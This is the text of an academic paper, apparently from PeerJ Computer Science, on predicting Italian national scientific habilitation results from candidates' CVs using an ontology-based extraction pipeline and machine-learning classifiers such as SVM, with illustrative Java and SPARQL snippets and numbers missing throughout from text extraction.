visualization by proxy: a novel framework for deferred interaction with volume data. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . wald i, johnson gp, amstutz j, brownlee c, knoll a, jeffers j, günther j, navratil p. . ospray—a cpu ray tracing framework for scientific visualization. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . wald i, woop s, benthin c, johnson gs, ernst m. . embree: a kernel framework for efficient cpu ray tracing. acm transactions on graphics ( ): doi . / . . wang d, luo x, yuan f, podhorszki n. . a data analysis framework for earth system simulation within an in-situ infrastructure. journal of computer and communications ( ): – doi . /jcc. . . wetherbee t, jones e, knox m, sandalski s, woodward p. . in-core volume rendering for cartesian grid fluid dynamics simulations. in: xsede conference on scientific advancements enabled by enhanced cyberinfrastructure. – . whitlock b, favre mj, meredith sj. . parallel in situ coupling of simulation with a fully featured visualization system. in: eurographics symposium on parallel graphics and visualization. – . ye y, miller r, ma k-l. . in situ pathtube visualization with explorable images. in: egpgv ' : proceedings of the th eurographics symposium on parallel graphics and visualization. – . yu h, wang c, grout rw, chen jh, ma kl. . in situ visualization for large-scale combustion simulations. ieee computer graphics and applications ( ): – . zhang p, liao x, zhang k. . patterns in spherical rayleigh-bénard convection: a giant spiral roll and its dislocations. physical review e ( ): .
submitted february accepted may published june corresponding author francesco poggi, fpoggi@cs.unibo.it, francesco.poggi@unibo.it academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs.
copyright poggi et al. distributed under creative commons cc-by. open access

predicting the results of evaluation procedures of academics

francesco poggi, paolo ciancarini, aldo gangemi, andrea giovanni nuzzolese, silvio peroni and valentina presutti

department of computer science and engineering (disi), university of bologna, bologna, italy; institute of data science and artificial intelligence, innopolis university, innopolis, russia; department of classical philology and italian studies, university of bologna, bologna, italy; stlab, institute of cognitive science and technologies, national research council, roma, italy

abstract

background. the reform of the italian university system introduced the national scientific habilitation (asn) as a requirement for applying to permanent professor positions. since the cvs of the candidates and the results of their assessments have been made publicly available, the asn constitutes an opportunity to perform analyses about a nation-wide evaluation process. objective. the main goals of this paper are: (i) predicting the asn results using the information contained in the candidates' cvs; (ii) identifying a small set of quantitative indicators that can be used to perform accurate predictions. approach. semantic technologies are used to extract, systematize and enrich the information contained in the applicants' cvs, and machine learning methods are used to predict the asn results and to identify a subset of relevant predictors. results. for predicting success in the role of associate professor, our best models using all predictors and the top predictors make accurate predictions (f-measure values higher than . ) in % and . % of the cases, respectively. similar results have been achieved for the role of full professor. evaluation. the proposed approach outperforms the other models developed to predict the results of researchers' evaluation procedures. conclusions. these results allow the development of an automated system for supporting both candidates and committees in future asn sessions and other scholars' evaluation procedures.

subjects: data science, digital libraries
keywords: predictive models, scientometrics, research evaluation, data processing, asn, machine learning, national scientific habilitation, academic assessment, science of science, informetrics

introduction

quantitative indicators have been extensively used for evaluating the scientific performance of a given research body. international institutions, national authorities, research and funding bodies have an increasing interest in indicators, mainly based on bibliometric data, which can be used to algorithmically assess the performance of their institutions. scimago (https://www.scimagojr.com/) (for journals), the performance ranking of scientific papers for world universities (http://nturanking.lis.ntu.edu.tw/) and the academic ranking of
world universities (http://www.shanghairanking.com/) (for universities) are popular examples of rankings that use bibliometric indicators to rate scientific performances. peer review is still the holy grail for research evaluation, but the pressure for more frequent and extensive assessments of the performance of researchers, research groups and institutions makes bibliometry attractive. currently, several countries use a combination of peer review and bibliometric indicators to allocate funding and evaluate the performance of higher education institutions. examples of this mixed strategy are the excellence in research for australia (era) and the valutazione della qualità della ricerca (vqr) in italy. the british research excellence framework (ref), successor of the research assessment exercise (rae), is another example, in which experts can make use of citation data as an additional input of their reviews. in many countries, bibliometric indicators are one of the factors that can be used for assessing individuals or institutions to allocate funding at a national level. for instance, in germany the impact factor of the publications is used in performance-based funding systems, in finland, the reallocation system uses the number of publications as one of the considered measures, in norway, a two-level bibliometric indicator is used for similar purposes, etc. (vieira, cabral & gomes, a). the growing importance of quantitative indicators may be mainly explained by their advantages compared to peer review processes: objectivity, low time and implementation costs, possibility of quick and cheap updates, ability to cover a large number of individuals, etc. however, in many cases peer review is still the only method available in practice, and is hence intensively used in many situations. we know that bibliometric indicators are more accepted in the assessment of large research bodies, but they are still used frequently for individuals. it is, therefore, very important to benchmark bibliometric indicators against traditional peer assessments in real situations. some studies have been carried out in recent years with the main goal of finding a relation between the two methods at several levels. at national level, the relation between bibliometric indicators and the results of the research assessment exercise (rae) in britain (norris & oppenheim, ; taylor, ) or the italian triennial assessment exercise (vtr) (abramo, d’angelo & caprasecca, ; franceschet & costantini, ) have been investigated. other studies focused on the assessments of departments (aksnes, ) and research groups (van raan, ). just a few works have been made at the individual level (nederhof & van raan, ; bornmann & daniel, ; bornmann, wallon & ledin, ), while many analyzed the correlation between indicators and research performances (leydesdorff, ; franceschet, ). recent works analyzed the correlation between traditional bibliometric indicators and altmetrics by also taking into account quality assessment procedures performed by peers (nuzzolese et al., ; wouters et al., ; bornmann & haunschild, ). all these works share the general finding that a positive and significant correlation exists between peer review and bibliometric indicators, and suggest that indicators can be useful tools to support peer reviews. in this work, we investigate the relation between quantitative indicators and peer review processes from a different perspective. 
the focus of the study is to analyze if and to what extent quantitative indicators can be used to predict the results of peer reviews. (footnote: the acronym asn stands for abilitazione scientifica nazionale. for the rest of the paper, all acronyms (e.g., asn, miur, anvur, etc.) are based on the original italian names, since they are well established in the italian scientific community. the english translations are also provided for the benefit of the international readers.) this problem is interesting for many different reasons. first of all, since a high number of
an approach based on machine learning techniques has been used to answer the following research questions: • rq : is it possible to predict the results of the asn using only the information contained in the candidates’ cvs? • rq : is it possible to identify a small set of predictors that can be used to predict the asn results? the rest of the work is organized as follows. ‘related work’ presents an overview of the related work. ‘methods and material’ provides necessary background information about the asn, gives an overview of the asn dataset, and describes the algorithms used in this poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of the related work with our study. missing data are labeled with ‘‘n.a.’’. poc stands for ‘‘prediction of citations’’, aoh for ‘‘analysis of h-index for peer judgements’’, and popj for ‘‘prediction of peer judgements’’. work papers authors discipline predictors task method ibáñez et al. (jasist, ) n.a. computer science poc gaussian bayesian net- works danell (jasist, ) , , neuroscience and physics poc quantile regression fu & aliferis (scientometrics, ) , n.a. medicine (+ textual features) poc support vector ma- chines lindahl (j. of informetrics, ) n.a. mathematics poc logistic regression bornmann & daniel (j. of informetrics, ) n.a. biomedicine aoh correlation analysis van raan (scientometrics, ) n.a. chemistry aoh correlation and error analysis cronin & meho (jasist, ) n.a. information science aoh correlation analysis vieira, cabral & gomes (jasist, a) , hard sciences (based on bibl. indices) popj rank ordered logistic regression jensen, rouquier & croissant (scientometrics, ) n.a. , all popj binomial regression tregellas et al. (peerj, ) n.a. biomedicine ( for the best model) popj logistic regression, support vector ma- chines this work , , , all popj support vector ma- chines (cfs for feature selection) work. in ‘results’ we describe the results of the analyses performed to answer the two aforementioned research questions, and we evaluate our work by comparing the predictive power of our approach with others at the state of the art. finally, in the last two sections we discuss the results and draw some conclusions. related work quantitative indicators have been extensively used for evaluating the scientific performance of a given research body. many recent studies have focused on the predictive power of such indicators for different purposes. these works can be divided into two main groups: those that use bibliometric indicators to predict other indicators and those that use bibliometric indicators to predict the results of evaluation procedures performed through a peer review process or a mixed strategy (i.e., a combination of peer review and bibliometric indicators). we discuss the main recent works on this topic. to facilitate the readers, table summarizes the main information about them and our study. a first challenge concerns the problem of identifying a subset of bibliometric indicators for predicting other bibliometric indices. ibáñez et al. ( ) introduced an approach based on gaussian bayesian networks to identify the best subset of predictive variables. the poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. approach has been tested on the data of spanish full professors of computer science using bibliometric indicators. 
the main drawback of the work is that no evaluation is presented: only a test on a small sample composed of three cases is discussed in the paper. other works focused on the prediction of paper citations. danell ( ) used the previous publication volume and citation rate of authors to predict the impact of their articles. the aim of this work is to investigate whether evaluation systems based on researchers' track records actually reward excellence. the study focused on two disciplines (i.e., episodic memory research and bose-einstein condensate) and developed a quantile regression model based on previous publication volume and citation rate to predict authors' relative citation rate. another work (fu & aliferis, ) faces the problem of predicting the number of citations that a paper will receive using only the information available at publication time. the model is based on support vector machines and has been tested on a mixture of bibliometric features and content-based features extracted from biomedical articles. a recent work (lindahl, ) investigates the ability of four indices to predict whether an author will attain excellence, operationalized by the indicator defined in bornmann ( ), in the following four years. the developed model is based on logistic regression and has been tested on a dataset composed of the track records of mathematicians.

only a few works focused on the problem of using bibliometric indicators to predict the results of evaluation procedures performed through peer-review processes. vieira, cabral & gomes ( a) compare three models for predicting the success of applicants to academic positions. the test dataset is composed of the track records of candidates to selection processes for associate and full professor in hard sciences that took place in portugal between and . the areas of chemistry, physics, biology, mathematics, mechanics, geology, and computer science were considered. in all cases, candidates have been assessed by a panel of peers, producing a ranking of the applicants. starting from bibliometric indicators (i.e., number of documents, percentage of cited, highly cited and citing documents, average number of authors, hnf -index, nir, snip, sjr, percentage of international collaborations, normalized impact and the number of scimago's q journals), a few composite indices have been derived through a factor analysis. following a discrete choice model, three predictive models based on rank ordered logistic regression (rolr) have been defined. the best model is able to predict the applicants placed in the first position by peers in % of the cases. by considering the problem of predicting the relative position of two candidates (i.e., who will be ranked in the higher position), the best model is able to predict % of the orderings. in another work (vieira, cabral & gomes, b), the performances of these models have been compared with a random model, observing that in % of the cases the applicant placed in first position by peers has a probability of being placed first that is better than chance. the authors conclude that the predictions provided by the models are satisfactory, and suggest that they can be used as an auxiliary instrument to support peer judgments. another work tested the predictive power of eight indicators for predicting scientists' promotions (jensen, rouquier & croissant, ).
the dataset used in the study is composed of the track records of , cnrs researchers from all disciplines who filled the cnrs report between and , whose data has been obtained by querying the web of science database. in the same timespan, the promotions of about cnrs researchers at all the five cnrs levels have been considered. a binomial regression model (logit) has been used to assess the overall relevance of eight quantitative indicators (h-index, normalized h-index, number of publications and citations, mean citations per paper, h-index per paper, age, gender) and to study their dependence. the results showed that the h-index is the best index for predicting the promotions, followed by the number of publications. differences exist between disciplines: in engineering, for instance, the number of publications is the best predictor. a logit model based on the best overall predictor (i.e., h-index) has been tested for each subdiscipline, leading to correct predictions in % of the cases. the authors conclude that bibliometric indicators do much better than randomness, which would achieve % of guessed promotions.

a recent study (tregellas et al., ) focused on the problem of predicting career outcomes of academics using the information in their publication records. the objective of the work is to identify the main factors that may predict the success of young researchers in obtaining tenure-track faculty research positions. the dataset used in this study is composed of the track records of phd graduates from biomedical sciences programs at the university of colorado from to . the ratio of faculty/non-faculty members (i.e., individuals employed/not employed in faculty positions) is %. for each phd graduate, indicators have been computed (i.e., sex, date of graduation, number of first-author and non-first-author publications, average impact factor of first-author and non-first-author publications, highest impact factor of first-author and non-first-author publications, weighted first-author and non-first-author publication count). logistic regression models and support vector machines have been used to investigate and compare the ability of the aforementioned indicators to predict career outcomes. the best prediction has been performed by the logistic regression model using three predictors (i.e., sex, date of graduation, and weighted first-author publication count), showing % accuracy. a similar result (i.e., % accuracy) has been obtained by the best model based on support vector machines using the same predictors. the results suggest that, while sex and months since graduation also predict career outcomes, a strong predoctoral first-author publication record may increase the likelihood of obtaining an academic faculty research position. the analysis of the results also showed, for all models, high negative predictive values (i.e., high accuracy in predicting those who will not obtain a faculty position) but low positive predictive values. this suggests that first-author publications are necessary but not sufficient for obtaining a faculty position. the main limitation of the study concerns the dataset size, since it was conducted on a small set of individuals at only one institution, focusing on a single discipline. the authors observe that it is then necessary to determine how generalizable the current findings are.
finally, the fact that all the best models are less than % accurate suggests that variables other than those considered here are also likely to be important factors in predicting future faculty status. other empirical studies focused on a single indicator (i.e., the h-index) to assess how it correlates with peer judgements. these works have the main limitation of being carried out on small samples for technical reasons (i.e., the difficulty of obtaining large sets of robust bibliometric data). in practice, they were generally limited to a single discipline: bornmann & daniel ( ) studied applications to long-term fellowships in biomedicine, van raan ( ) analyzed the evaluation of about researchers in chemistry, and cronin & meho ( ) studied influential information scientists from the us. to the best of our knowledge, no other work analyzed the predictive power of quantitative indicators for predicting the results of peer judgments of researchers.

methods and material
this section provides necessary background information about the asn and describes the asn dataset, the techniques used to analyze this text corpus, and the ontology developed for storing data in a semantic format. a description of the classification and feature selection algorithms used in the analyses presented in 'results' concludes the section.

data from the italian scientific habilitation: background
the italian law / (law, ) introduced substantial changes in the national university system. before , in the italian universities there were three types of tenured positions: assistant professor, associate professor and full professor. the reform suppressed the position of assistant professor and replaced it with two types of fixed-term positions called type a and type b researcher. type a positions last for three years and can be extended for a further two years. type b positions last for three years and have been conceived as a step towards becoming a tenured associate professor, since at the time of recruitment universities must allocate resources and funding for the promotion. each academic is bound to a specific recruitment field (rf), which corresponds to a scientific field of study. rfs are organized in groups, which are in turn sorted into scientific areas (sas). in this taxonomy defined by decree (ministerial decree , ), each of the rfs is identified by an alphanumeric code in the form aa/gf, where aa is the id of the sa (in the range - ), g is a single letter identifying the group of rfs, and f is a digit denoting the rf. for example, the code of the rf "neurology" is /d , which belongs to the group "specialized clinical medicine" ( /d), which is part of the sa "medicine" ( ). the sas are listed in table , and the rfs are listed in poggi et al. ( b). under the new law, only people who have attained the national scientific habilitation (asn) can apply for tenured positions in the italian university system. it is important to note that a habilitation does not guarantee any position by itself. the asn has indeed been conceived to attest the scientific maturity of researchers and is a requirement for access to a professorship in a given rf. each university is responsible for creating new positions for a given rf and professional level provided that financial and administrative requirements are met, and handles the hiring process following local regulations and guidelines.
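the aa/gf identifiers described above can be decomposed mechanically into area, group and field. the following sketch is purely illustrative: the class, the method names and the example value "01/B1" are ours and are not taken from the asn specification or from the software described later in the paper.

```java
// illustrative parser for rf identifiers of the form aa/gf described above.
// the example value "01/B1" is a hypothetical code used only for demonstration.
public final class RecruitmentFieldCode {
    public final String area;   // aa: two-digit id of the scientific area (sa)
    public final char group;    // g: one letter identifying the group of rfs
    public final char field;    // f: one digit denoting the rf within the group

    private RecruitmentFieldCode(String area, char group, char field) {
        this.area = area; this.group = group; this.field = field;
    }

    public static RecruitmentFieldCode parse(String code) {
        // expected pattern: two digits, a slash, one letter, one digit (e.g. "01/B1")
        if (!code.matches("\\d{2}/[A-Z]\\d")) {
            throw new IllegalArgumentException("not an aa/gf code: " + code);
        }
        return new RecruitmentFieldCode(code.substring(0, 2), code.charAt(3), code.charAt(4));
    }

    public static void main(String[] args) {
        RecruitmentFieldCode rf = parse("01/B1"); // hypothetical example code
        System.out.println("sa=" + rf.area + " group=" + rf.group + " rf=" + rf.field);
    }
}
```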
the first two sessions of the asn took place in and . although the law / prescribes that the asn must be held at least once a year, the next sessions took place in ( session), ( sessions) and ( sessions). at the time of the writing of this article, the last session of the asn was still in progress, and the dates of the next sessions had not yet been set. for each of the rfs, the ministry of university and research (miur) appoints an examination committee for the evaluation of the candidates.

table : the italian scientific areas. for each we report the numeric id, a three-letter code, the name of the area and the number of rfs it contains.
• mcs: mathematics and computer sciences
• phy: physics
• che: chemistry
• eas: earth sciences
• bio: biology
• med: medical sciences
• avm: agricultural sciences and veterinary medicine
• cea: civil engineering and architecture
• iie: industrial and information engineering
• apl: antiquities, philology, literary studies, art history
• hpp: history, philosophy, pedagogy and psychology
• law: law
• ecs: economics and statistics
• pss: political and social sciences

the committees are composed of five full professors who are responsible for the evaluation of the applicants for associate and full professor. committee members are randomly selected from a list of eligible professors, for a total of professors. different committees have been appointed for the , and - sessions, respectively. in order to apply to a session of the asn, candidates have to submit a curriculum vitae with detailed information about their research activities. although the asn is bound to a specific rf and professional level, it is possible to apply in different rfs and roles. in , for example, / ( . %) applicants for full professor in the rf /h (information processing systems) also applied to /b (informatics). those who fail to get a habilitation cannot apply again to the same rf and level in the next session. once acquired, a habilitation lasts for six years.

the asn introduced two types of parameters called bibliometric and non-bibliometric indicators, respectively. bibliometric indicators apply to scientific disciplines for which reliable citation databases exist. the three bibliometric indicators are:
• normalized number of journal papers
• total number of citations received
• normalized h-index.
since citations and paper counts increase over time, a normalization based on the scientific age (the number of years since the first publication) is used to compute most of the indicators. the aforementioned indicators are used for all rfs belonging to the first nine sas ( - ), with the exception of the rfs /c , /d , /e , /e , /f and the four rfs belonging to the group psychology ( /e). these rfs are collectively denoted as bibliometric disciplines.
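to make the role of the scientific age concrete, a schematic formulation of this kind of normalization is sketched below. it is only an illustrative reading of the idea, under the assumption of a plain division by scientific age; it is not the official anvur definition.

$$a = y_{\text{session}} - y_{\text{first publication}} + 1, \qquad \hat{x} = \frac{x}{a}$$

where $x$ is a raw indicator (e.g., the number of journal papers considered for the session) and $\hat{x}$ is its age-normalized counterpart.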
non-bibliometric indicators apply to the rfs for which miur assessed that citation databases are not "sufficiently complete", and hence bibliometric indices cannot be reliably computed. the three non-bibliometric indicators are:
• normalized number of published books
• normalized number of book chapters and journal papers
• normalized number of papers published in "top" journals.
these are used for all rfs belonging to the last five sas ( - ), with the exceptions described above. these rfs are denoted as non-bibliometric disciplines. it is important to remark that this terminology (i.e., "bibliometric" and "non-bibliometric") is used in the official miur documents but is not consistent with the terminology used by the scientometric community. non-bibliometric indicators, for instance, are indeed bibliometric, being based on paper counts. given that these terms became standard within the italian research community, we will follow the miur "newspeak" according to the definitions above. the values of the indicators for each candidate were computed by the national agency for the assessment of universities and research (anvur), a public agency established with the objective of assessing italian academic research. data from scopus and web of science were used for this computation, and only publications in a time window of ten years before the asn session were considered. the computed indicators and the candidates' cvs are the only information provided to the evaluation committees for their assessments. the sessions of the asn have been analyzed from a quantitative point of view in marzolla ( ), peroni et al. ( ) and di iorio, peroni & poggi ( ).

asn data
the number of applications submitted to the six sessions of the asn are reported in table .

table : the number of applications for associate and full professor for each session of the asn.

we focused on the session of the asn because: (i) it is a representative sample of the whole population asking for habilitation (this session was the first and received more than half of the overall submissions across all years of the asn); (ii) since in different people were appointed to the committees, in this way we exclude biases and other problems introduced by changes in the evaluation committees. overall, the session of the asn received , applications spanning rfs. for each application, we collected three different documents: the cv, the official document with the values of the three quantitative indicators described in the previous section, and the final reports of the examination committee. these documents are in pdf, and have been made publicly available on the anvur site for a short period of time. some basic information and statistics about the asn session are summarized in poggi et al. ( b). since anvur did not provide a template for the habilitation, the cvs are very heterogeneous, varying in terms of formatting, internal structure and organization. this heterogeneity and the massive amount of information contained in the , pdfs are two of the main challenges faced in this work. in order to manage this problem, we developed an ontology which provides a uniform representation of the information and a reference conceptual model. it is the basis of both the data processing and the subsequent analyses, as described in the following sections.

ontology description
the objective of the academic career (ac) ontology is to model the academic career of scholars. ac is an owl (w3c, ) ontology composed of fifteen modules, each of which is responsible for representing a particular aspect of the scientific career of a scholar. the first two modules of the ac ontology concern personal information and publications.
the next modules pertain to ten categories suggested by anvur:
1. participation in scientific events with specific roles (e.g., speaker, organizer, attendee, etc.)
2. involvement and roles in research groups (management, membership, etc.)
3. responsibility for studies and researches granted by qualified institutions
4. scientific responsibility for research projects
5. direction of or participation in editorial committees
6. academic and professional roles
7. teaching or research assignments (fellowships) at qualified institutes
8. prizes and awards for scientific activities
9. results of technological transfer activities (e.g., spin-offs, patents, etc.)
10. other working and research experiences
the last three modules concern scholars' education, scientific qualifications, and personal skills and expertise.

data processing
the processing of a vast set of documents such as the corpus of the asn curricula is not a trivial task. the main issue to face in this process is the management and harmonization of its heterogeneity in terms of kinds of information, structures (e.g., tables, lists, free text), styles and languages, just to cite a few. nonetheless, the automatic extraction of information from cvs and its systematization in a machine-processable format is a fundamental step for this work, since all the analyses described in 'results' are based on these data. for this purpose, we developed pdf to academic career ontology (paco), a software tool that is able to process the researchers' cvs, extract the most relevant information, and produce a knowledge graph that conforms to the ac ontology. the processing performed by paco is composed of four consecutive steps, which correspond to the software modules constituting paco's architecture, as shown in fig. .

figure : an overview of the paco toolchain composed of four sub-modules (circles). artifacts (i.e., inputs/outputs of the sub-modules) are depicted as rectangles.

the processing of an applicant's cv can be summarized as follows:
• html conversion: the pdf-to-html converter takes as input a pdf and produces as output an html version of the cv composed of inline elements and presentational elements. the structure of the document is not reconstructed in this phase. in particular, the containment relations between elements (e.g., cells in a table, items in a list, etc.) are missing. for instance, a table is converted into a series of rectangles with borders (the cells) followed by a series of inline elements (the text). all the elements are at the same level in the output document hierarchy, and no explicit relation between them is maintained.
• structure re-construction: the structure builder uses the presentational information computed in the previous phase to infer the structure of the document. different strategies have been developed to recognize meaningful patterns in the presentation and reconstruct the document hierarchy. for example, a mark positioned near an inline element containing text is interpreted as a list item, and a sequence of consecutive list items is interpreted as a list. the output is an xml document in which the original textual content is organized in meaningful structural elements.
• semantic analysis: the objective of the semantic analyzer is to annotate the output of the previous phase with information about its content.
for example, it has to infer if a list is a list of publications, awards, projects, etc. a series of analyses is performed for each element, from simple ones (e.g., to test if an element contains a name, surname, birth date, etc.) implemented through basic techniques such as the use of heuristics or pattern matching, to more complex ones (e.g., to identify publications, roles, etc.) implemented using external tools and libraries. another important technique is to leverage the homogeneity of structured elements (e.g., of all the items in a list or all the cells of a column) to infer meaningful information about their content, using the approach described in poggi, cigna & nuzzolese ( ). the basic idea is that, for instance, if the majority of the elements of a list have been recognized as publications, it is then reasonable to conclude that the others are publications too. the output of this phase is an xml document annotated with the results of the semantic analysis.
• triplification: the triplifier is responsible for populating a knowledge graph with the information inferred in the previous phase. the marked-up xml document is the input of this stage, and the output is a knowledge graph that conforms to the ac ontology.

the data extracted from the applicants' cvs by paco have also been semantically enriched with information from the following external sources:
• cercauniversita (http://cercauniversita.cineca.it/), a miur service that provides information and statistics about italian professors, universities, degree programs, students, funding, etc.: used for information about the candidates' careers within the italian university system;
• the taste database, produced by taking stock: external engagement by academics (taste), a european project funded under the fp program that developed a database about the relations between universities and enterprises in italy (see https://eventi.unibo.it/taste): used for data about researchers' entrepreneurship and industrial activities;
• semantic scout (http://stlab.istc.cnr.it/stlab/project/semantic-scout/), a service that provides cnr scientific and administrative data in a semantic format: used for information about researchers of the italian national council of research (cnr).
the final outcome of this process is the knowledge graph from which we computed the predictors used in the analyses discussed in the rest of this paper.

identification of the prediction algorithm
in order to implement a supervised learning approach, we needed to create a training set in which the ground truth is obtained from the final reports of the examination committees. the instances of our dataset correspond to the , applications submitted to the asn. for each instance, we collected predictors, of which are numeric and are nominal. the only source of data used to build our dataset is the knowledge graph containing the data extracted from the applicants' curricula and enriched with external information.
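as an illustration of how a numeric predictor can be read off this knowledge graph, the sketch below counts the publications of a single applicant with a sparql query executed through apache jena. it is only an illustrative sketch under assumed names: the file name, the namespace and the identifiers ex:applicant42 and ex:hasPublication are hypothetical placeholders, not the actual iris defined by the ac ontology.

```java
// illustrative only: reads one numeric predictor (publication count) for one applicant
// from an rdf serialization of the knowledge graph. iris and file name are hypothetical.
import org.apache.jena.query.*;
import org.apache.jena.rdf.model.Model;
import org.apache.jena.riot.RDFDataMgr;

public class PredictorFromKnowledgeGraph {
    public static void main(String[] args) {
        Model kg = RDFDataMgr.loadModel("asn-knowledge-graph.ttl"); // hypothetical file name
        String query =
            "PREFIX ex: <http://example.org/ac#> " +                // placeholder namespace
            "SELECT (COUNT(?pub) AS ?n) " +
            "WHERE { ex:applicant42 ex:hasPublication ?pub }";      // placeholder identifiers
        try (QueryExecution qe = QueryExecutionFactory.create(query, kg)) {
            ResultSet results = qe.execSelect();
            if (results.hasNext()) {
                int publicationCount = results.next().getLiteral("n").getInt();
                System.out.println("number of publications = " + publicationCount);
            }
        }
    }
}
```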
the predictors that have been computed belong to one of the following two categories:
• numeric and nominal values extracted from the cvs (e.g., the number of publications) or derived from the cvs using external sources (e.g., the number of journal papers has been computed using the publication list in the cvs and querying online databases like scopus);
• quantitative values calculated using the values from the previous point. for example, we computed statistical indicators such as the variance of the number of journal papers for each applicant in the last n years.
the aforementioned predictors and the habilitation class feature are our starting point to investigate the performances of different machine learning approaches. we decided not to explicitly split the dataset into training and test sets, and to systematically rely on cross-fold validation instead. in particular, the data reported in this work are related to the -fold validation, but we have also performed a -fold one with very similar results. the following supervised machine learning algorithms have been tested:
• nb: naïve bayes (john & langley, )
• kn: k-nearest neighbours classifier (k chosen using cross validation) (aha, kibler & albert, )
• c4.5: c4.5 decision tree (unpruned) (quinlan, )
• randf: random forest (breiman, )
• svm: support vector machine trained with sequential minimal optimization (keerthi et al., ).
the rationale behind this choice is to have representatives of the main classification methods that have shown effectiveness in past research. all learners have been tuned using common best practices. svm has been tested with various kernels (in order to account for complex non-linear separating hyperplanes); however, the best results were obtained with a relatively simple polynomial kernel. the parameters for the resulting model have been tuned using the grid method (he & garcia, ). we tested the learners on different data samples, obtaining similar results for both bibliometric and non-bibliometric rfs. for example, table shows the results we obtained with these machine learning algorithms for the applicants to the rf /e (level ii).

table : performance of the machine learning algorithms investigated for the classification of the applicants to the rf /e (level ii). for each algorithm we report precision, recall and f-measure values.

notice that we tested the performances of the learners only with respect to the not qualified class. we do that because we are mainly interested in understanding if we can use machine learning techniques to identify unsuccessful applicants, i.e., those who were judged not qualified. we also report a limited amount of analysis data: specifically, in this work we focus on precision and recall (and the related f-measure). other aspects of the learners (such as the roc curve) have been analyzed in our tests, but they were always aligned with the results expressed by the three measures we are providing here. the results show that the best classifiers are those known to perform better on feature-rich datasets.
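a minimal, illustrative re-implementation of this evaluation setup with the weka library is sketched below. it is not the code used in the paper: the arff file name, the class label "not_qualified", the upper bound for k and the fold count are assumptions made only for the example (the exact fold counts used in the study are not preserved here).

```java
// illustrative comparison of the five learners listed above under k-fold cross-validation,
// reporting precision/recall/f-measure for the "not qualified" class.
// file name, class label and fold count are assumptions, not the paper's actual values.
import java.util.Random;
import weka.core.Instances;
import weka.core.converters.ConverterUtils.DataSource;
import weka.classifiers.Classifier;
import weka.classifiers.Evaluation;
import weka.classifiers.bayes.NaiveBayes;
import weka.classifiers.lazy.IBk;
import weka.classifiers.trees.J48;
import weka.classifiers.trees.RandomForest;
import weka.classifiers.functions.SMO;

public class AsnLearnerComparison {
    public static void main(String[] args) throws Exception {
        Instances data = DataSource.read("asn_rf_candidates.arff"); // hypothetical export of one rf
        data.setClassIndex(data.numAttributes() - 1);               // class = habilitation outcome

        J48 c45 = new J48();
        c45.setUnpruned(true);            // unpruned c4.5, as stated in the text
        IBk knn = new IBk();
        knn.setKNN(10);                   // upper bound for k (an assumption)
        knn.setCrossValidate(true);       // choose k via cross-validation, as stated in the text

        Classifier[] learners = { new NaiveBayes(), knn, c45, new RandomForest(), new SMO() };
        String[] names = { "NB", "KN", "C4.5", "RandF", "SVM" };

        int notQualified = data.classAttribute().indexOfValue("not_qualified"); // hypothetical label
        for (int i = 0; i < learners.length; i++) {
            Evaluation eval = new Evaluation(data);
            eval.crossValidateModel(learners[i], data, 10, new Random(1)); // fold count assumed
            System.out.printf("%s  P=%.3f  R=%.3f  F=%.3f%n", names[i],
                    eval.precision(notQualified), eval.recall(notQualified),
                    eval.fMeasure(notQualified));
        }
    }
}
```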
in particular, svm outperforms the other classification methods, and for this reason it has been used in the rest of our analyses.

feature selection algorithm
in this section we describe the technique we used to analyze the relevance of the various predictors for classification purposes. the task consists in identifying a small set of predictors that allows us to perform accurate predictions of the asn results (rq2). in case of a large number of predictors, several attribute engineering methods can be applied. the most widely adopted is attribute selection, whose objective is identifying a representative set of attributes from which to construct a classification model for a particular task. the reduction of the number of attributes can help learners that do not perform well with a large number of attributes. this also helps in reducing the computation time needed to create the predictive model.

there are two main classes of attribute selection algorithms: those that analyze the performance of the learner in the selection process (i.e., wrappers) and those that do not use the learner (i.e., filters). the first class is usually computationally expensive, since the learner runs continuously to check how it performs when changing the attributes in the dataset. that leads to computation times that are two or more orders of magnitude larger compared to the learner itself. for this reason, we did only some limited experiments with learner-aware attribute selection. in our test cases, the results obtained were marginally better than those obtained with processes not using the learner. consequently, we used a filter-based approach in our in-depth analysis. we used correlation-based feature selection (cfs) (hall & holmes, ), which is the first method that evaluates (and hence ranks) subsets of attributes rather than individual attributes. the central hypothesis of this approach is that good attribute sets contain attributes that are highly correlated with the class, yet uncorrelated with each other. at the heart of the algorithm is a subset evaluation heuristic that takes into account the usefulness of individual attributes for predicting the class along with the level of intercorrelation among them. the aforementioned technique has been used in the analysis presented in 'analysis of the quantitative indicators of applicants'.

results
the aim of the analyses presented in this section is to answer the two research questions (rqs) discussed in 'introduction'. given the huge amount of data provided by the curricula of the applicants, we want to understand if machine learning techniques can be used to effectively distinguish between candidates who got the habilitation and those who did not (rq1). we are also interested in identifying a small set of predictors that can be used to perform accurate predictions for the different rfs and scientific levels of the asn (rq2). we conclude this section with an assessment of the predictive power of our approach, in which we compare our best models with those that have been proposed in the literature to solve similar problems.

analysis of the recruitment fields and areas
the objective of the first experiment is to predict the results of the asn (rq1). we used svm, which is the best-performing machine learning algorithm that emerged from the tests discussed in 'identification of the prediction algorithm'.
we classified our dataset with respect to the class of candidates who got the habilitation using the svm learner. we first split the dataset into two partitions containing the data about candidates for level i and level ii, respectively. for each partition, we classified separately the applicants of each rf. the results of our analysis are published in poggi et al. ( a), and are summarized by the boxplots in fig. . the boxplot is a method for graphically depicting the distribution of data through their quartiles. the central rectangle spans the first quartile to the third quartile. the segment inside the rectangle shows the median, and "whiskers" above and below the box show the locations of the minimum and maximum. from these results, we observe that the performances of the learners for bibliometric and non-bibliometric rfs are very similar, and that they are distributed evenly (i.e., there is not a polarization of bibliometric and non-bibliometric rfs). moreover, we note that / ( . %) and / ( %) rfs have f-measure scores higher than . for professional levels i and ii, respectively.

figure : boxplots depicting the performance of the svm algorithm for academic levels i and ii. precision, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) rfs.

